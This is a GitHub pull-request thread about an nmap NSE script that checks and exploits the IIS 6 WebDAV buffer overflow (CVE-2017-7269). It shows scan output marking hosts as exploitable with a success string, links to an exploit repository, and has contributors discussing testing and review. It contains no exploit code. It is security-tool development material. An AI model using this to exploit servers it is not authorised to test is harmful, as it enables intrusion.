|   VULNERABLE:
|   Buffer Overflow in IIS 6 and Windows Server 2003 R2
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2017-7269
|     Risk factor: High  CVSS: 10.0
|       Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
|       in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
|       with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
|       Original exploit by Zhiniang Peng and Chen Wu.
|
|     Disclosure date: 2017-03-26
|     Exploit results:
|       HTTP/1.1 200 OK
|   Connection: close
|   Date: Fri, 02 Nov 2018 17:12:57 GMT
|   Server: Microsoft-IIS/6.0
|   Content-Length:26
|
|   HHIT CVE-2017-7269 Success
|   CVE-2017-7269
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269
|       https://github.com/edwardz246003/IIS_exploit
|_      https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1039/tcp open  sbl
1041/tcp open  danf-ak2

Vulnerable machine with the port 8080 exposed:

1041/tcp open  danf-ak2
8080/tcp open  http-proxy
| iis-buffer-overflow:
|   VULNERABLE:
|   Buffer Overflow in IIS 6 and Windows Server 2003 R2
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2017-7269
|     Risk factor: High  CVSS: 10.0
|       Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
|       in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
|       with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
|       Original exploit by Zhiniang Peng and Chen Wu.
|
|     Disclosure date: 2017-03-26
|     Exploit results:
|       HTTP/1.1 200 OK
|   Connection: close
|   Date: Fri, 02 Nov 2018 20:36:53 GMT
|   Server: Microsoft-IIS/6.0
|   Content-Length:26
|
|   HHIT CVE-2017-7269 Success
|   CVE-2017-7269
|     References:
|       https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269
|_      https://github.com/edwardz246003/IIS_exploit

I think the exploit is definitely completed :)

@rewanthtammana
Copy link
Contributor Author

Thanks, @fakenine @tarraschk for your contribution.

@rewanthtammana
Copy link
Contributor Author

rewanthtammana commented Nov 6, 2018
edited
Loading

@bonsaiviking @cldrn @fyodor
The updated script is tested on both vulnerable and non-vulnerable machines and is working good. Even after executing the exploit script, the server is stable and fully functional.

Please look into the changes and acknowledge, so that I can commit the new NSE script into the current repo.

@tarraschk
Copy link

Hey @rewanth1997 : the CI build has failed, is it why we do not have answers from the maintainers?

@rewanthtammana
Copy link
Contributor Author

They are busy integrating new features into nmap. Everything gets resolved/merged based on priority basis and for now this is the least priority feature that needs to be reviewed.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@fakenine fakenine fakenine requested changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@rewanthtammana @fakenine @tarraschk